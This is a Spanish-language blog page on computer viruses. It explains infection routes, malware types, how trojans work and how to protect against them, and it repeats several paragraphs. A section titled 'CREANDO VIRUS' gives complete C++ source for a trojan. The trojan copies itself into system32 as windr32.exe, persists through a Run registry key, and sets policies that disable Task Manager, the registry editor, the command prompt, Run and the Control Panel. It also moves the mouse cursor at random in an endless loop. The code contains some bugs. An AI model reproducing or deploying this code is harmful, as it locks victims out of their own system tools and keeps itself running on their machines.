INTRODUCCIÓN
Dentro de un extenso mundo donde la información se maneja de forma digital gestionadas por diversos software implementados en la computadora, nos encontramos con software maliciosos que tiene como objetivo infiltrarse en el ordenador y realizar un sin número de actividades dañinas para nuestra información.
El proposito de este sitio es ampliar conocimientos sobre los llamados virus informaticos, con el objetivo de encontrar soluciones para algunos de ellos, se debe tener siempre en cuenta que los software maliciosos siempre estaran asechando nuestro ordenador, por lo tanto es recomendable tomar todas las precauciones posible teniendo en cuenta la optimización de nuestra pc.
Debemos saber que los virus están en constante evolución como los virus que afectan a los humanos cada vez son mas fuertes y mas invulnerables a los ataques de los antivirus y afectan a empresarios de una manera muy grande, los creadores de dicho virus son los hackers ya que ellos manipulan donde deben atacar sus programas ya que estos son solo programas que atacan el sistema.
Virus
Redes Sociales.
Sitios webs fraudulentos.
Redes P2P (descargas con regalo)
Dispositivos USB/CDs/DVDs infectados.
Sitios webs legítimos pero infectados.
Adjuntos en Correos no solicitados (Spam)
Estos software o código malicioso se divide según la manera de propagación o acción que ejercen .
caballo de troya o troyano, gusano o worm, parasitos, bomba logica, entre otros
Se dara una peque;a rese;a sobre los virus informaticos antes mencionado
Bombas Lógicas o de Tiempo
Programas que se activan al producirse un acontecimiento determinado. la condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o un estilo técnico Bombas Lógicas), etc... Si no se produce la condición permanece oculto al usuario
gusano
es un malware que tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un sistema operativo que generalmente son invisibles al usuario.Los gusanos informáticos se propagan de ordenador a ordenador, pero a diferencia de un virus, tiene la capacidad a propagarse sin la ayuda de una persona.Lo más peligroso de los worms o gusanos informáticos es su capacidad para replicarse en tu sistema, por lo que tu ordenador podría enviar cientos o miles de copias de sí mismo, creando un efecto devastador enorme
Parásitos
Tipo de virus infromatico que se adhieren a archivos (especialmente ejecutables
Teniendo en cuenta la función de algunos virus informáticos, se ampliara sobre los troyanos. ya que estos virus son muy curiosos a tratar por su forma de infectar una pc, mencionaremos algunas caracteristicas de estos, su proposito y como protegernos de ellos.
|
Son programas
informáticos que parecen ser software útil pero que ponen en peligro la
seguridad y provocan muchos daños. Un troyano reciente apareció como un mensaje
de correo electrónico que incluye archivos adjuntos que aparentaban ser
actualizaciones de seguridad de Microsoft, pero que resultaron ser virus que
intentaban deshabilitar el software antivirus y de servidor de seguridad
CARACTERÍSTICAS
CARACTERÍSTICAS
Conexión
directa (el cliente se conecta al
servidor).
Conexión
inversa (el servidor se conecta al cliente).
La
conexión inversa tiene claras ventajas sobre la conexión directa, esta traspasa
algunos firewall (la mayoría de los firewall
no analizan los paquetes que
salen de la computadora, pero que
sí analizan los que entran), pueden ser usados en redesituadas detrás de
un router sin problemas (no es
necesario redirigir los puertos) y no es necesario conocer
la dirección IP del
servidor.
PROPÓSITO
Instalación
de
otros programas (incluyendo otros
programas maliciosos).
programas maliciosos).
Robo
de información personal: información bancaria,
contraseñas, códigos de seguridad.
contraseñas, códigos de seguridad.
Borrado,
modificación o transferencia de archivos
(descarga o subida).
(descarga o subida).
Ejecutar
o terminar procesos.
Apagar
o reiniciar el equipo.
Monitorizar
las pulsaciones del teclado.
Realizar
capturas de pantalla.
Ocupar
el espacio libre del disco duro con archivos inútiles.
Borra
el disco duro
Como
Protegerse de
lo
Protegerse de
los Troyanos
Algunos
patrones para identificarlos son:
un programa desconocido se ejecuta al iniciar el
ordenador, se crean o borran archivos de forma automática, el ordenador funciona más lento de lo
normal, errores en el sistema operativo.
Por otro lado los programas antivirus están diseñados para eliminar todo tipo de software malicioso,
además de eliminarlos también previenen de nuevas infecciones actuando antes de que el sistema
resulte infectado. Es muy recomendable tener siempre un antivirus instalado en el equipo y a ser
posible también un firewall.
ordenador, se crean o borran archivos de forma automática, el ordenador funciona más lento de lo
normal, errores en el sistema operativo.
Por otro lado los programas antivirus están diseñados para eliminar todo tipo de software malicioso,
además de eliminarlos también previenen de nuevas infecciones actuando antes de que el sistema
resulte infectado. Es muy recomendable tener siempre un antivirus instalado en el equipo y a ser
posible también un firewall.
CREANDO VIRUS
código de virus troyano en c++
#include <iostream.h>
#include <windows.h>
#include <stdio.h>
void moverAleatorio();
int crearkey(char *path);
void copiarvirus(char *camino);
char *getRuta();
void bloquear(char *bloqueo);
char * bloqueouno ="DisableTaskMgr";
char * bloqueodos ="NoControlPanel";
char * bloqueotres ="DisableRegistrytools";
char * bloqueocuatro ="DisableCMD";
char * bloqueocinco ="NoRun";
int main()
{
FreeConsole(); //para que no aparezca la consola msdoschar * senda=getRuta();//puntero que se asigna ruta que retorna un puntero
char path[256];
char pathD[256];
HMODULE nombre= GetModuleHandle(0);
GetModuleFileName(nombre,pathD,256);
strcpy(path,senda);
strcat(path,"windr32.exe");
crearkey(senda); //para que el virus se este ejecutando
/*gpedit.msg para activar simbolo del sistema*/
bloquear(bloqueouno);
bloquear(bloqueodos);
bloquear(bloqueotres); //bloquea herramientas del sistema
bloquear(bloqueocuatro);
bloquear(bloqueocinco);
while(true)
{ //Mirntras no se elimine la llave el virus va a bloquear//herramientas del sistema
crearkey(senda);
bloquear(bloqueouno);
bloquear(bloqueodos);
bloquear(bloqueotres);
bloquear(bloqueocuatro);
bloquear(bloqueocinco);
// el if verifica si el puntero esta en una posicion y mover el puntero
if((pathD[8]==path[8])&&(pathD[20]==path[20]))
{
moverAleatorio();
}
}
return 0;
}
void moverAleatorio()
{
int mx,my;
//toman la medida de la pantalla
mx=GetSystemMetrics(SM_CXSCREEN)-1;
my=GetSystemMetrics(SM_CYSCREEN)-1;
//mediante un num aleatorio se mueve el puntero en distintas posiciones
SetCursorPos(1+ (rand() % mx),1+ (rand() % my));
_sleep(2000);
}
char *getRuta()
{
char *ruta=getenv("windir");
strcat(ruta, "\\system32\\"); //concatena
return ruta;
}
int crearkey(char * path)
{
int regKey ,check;
HKEY hkey;
regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\CurrentVersion\\Run",&hkey);
if(regKey==0) // si existe la ruta se aloja en la ruta
{
RegSetValueEx((HKEY)hkey,"windr32",0,REG_SZ,(BYTE*)path,strlen(path));
return 0;
}
else
if(regKey!=0)
return 1;
}
void copiarvirus(char *camino)
{
char path[256];
char nombre[]="windr32";
strcat(nombre , ".exe");
strcat(camino,nombre);
CopyFile(path,camino,false);
}
void bloquear(char * bloqueo)
{
try
{
HKEY hMyBuffer=NULL,hMyKey=NULL;
DWORD value=1;
if(bloqueo ="DisableCMD")
{
if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
{
if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
{
RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
RegCloseKey(hMyKey);
}
}
}
if( bloqueo = "DisableRegistrytools") {
if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS){
if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
{
RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
RegCloseKey(hMyKey);
}
}
}
if(bloqueo="NoRun")
{
if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
{
if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
{
RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
RegCloseKey(hMyKey);
}
}
}
if(bloqueo = "NoControlPanel")
{
if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
{
if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
{
RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
RegCloseKey(hMyKey);
}
}
}
if(bloqueo = "DisableTaskMgr")
{
if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
{
if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
{
RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
RegCloseKey(hMyKey);
}
}
}
}
catch(...)
{
}
}
CONCLUSIÓN
¿Cual es el futuro de los virus?
En conclusión se tiene que los virus siempre estarán existiendo y estos serán cada vez mas difícil de detectarse y ser eliminado por un antivirus u otras herramientas de protección por lo tanto se le recomienda desinfectar continuamente sus memorias USB, vacunar su equipo de trabajo, y analizarlo constantemente para que estos no sean victimas de un hacker.
Se recomienda no acceder a paginas web donde no se tenga la seguridad que son confiables, sobre todo no descargar programas de estas paginas ya que si los hackers son capaz de infiltrar paginas legitimas, imaginémonos como serán las paginas en donde no hay supervición alguna de los archivos que se suben.
A las personas que tienen negocios de cyber se les recomienda desinfectar sus máquinas en un tiempo determinado y que dichas maquinas contengan herramientas para evitar que los virus logren acceder a ellas, tanto para su negocio ya que estos pueden da;ar las partes lógicas de cada pc, asi como para los usuarios de la misma.
En las empresa recomendamos hacer uso de antivirus, y denegar algunos accesos a insertar usb, tanto para evitar la infección a los equipos como el robo de información ya que se debe mantener protegida toda información contenida en los pc.
Si se tienen celulares inteligentes es necesario descargar su antivirus para la desinfección de algunos archivos de descarga, ya que los virus del presente y el futuro ya no solo su blanco serán las computadoras y servidores, sino que se añadirá a la lista el mundo de telefonía móvil.
¿Cual es el futuro de los virus?
En conclusión se tiene que los virus siempre estarán existiendo y estos serán cada vez mas difícil de detectarse y ser eliminado por un antivirus u otras herramientas de protección por lo tanto se le recomienda desinfectar continuamente sus memorias USB, vacunar su equipo de trabajo, y analizarlo constantemente para que estos no sean victimas de un hacker.
Se recomienda no acceder a paginas web donde no se tenga la seguridad que son confiables, sobre todo no descargar programas de estas paginas ya que si los hackers son capaz de infiltrar paginas legitimas, imaginémonos como serán las paginas en donde no hay supervición alguna de los archivos que se suben.
A las personas que tienen negocios de cyber se les recomienda desinfectar sus máquinas en un tiempo determinado y que dichas maquinas contengan herramientas para evitar que los virus logren acceder a ellas, tanto para su negocio ya que estos pueden da;ar las partes lógicas de cada pc, asi como para los usuarios de la misma.
En las empresa recomendamos hacer uso de antivirus, y denegar algunos accesos a insertar usb, tanto para evitar la infección a los equipos como el robo de información ya que se debe mantener protegida toda información contenida en los pc.
Si se tienen celulares inteligentes es necesario descargar su antivirus para la desinfección de algunos archivos de descarga, ya que los virus del presente y el futuro ya no solo su blanco serán las computadoras y servidores, sino que se añadirá a la lista el mundo de telefonía móvil.
No hay comentarios:
Publicar un comentario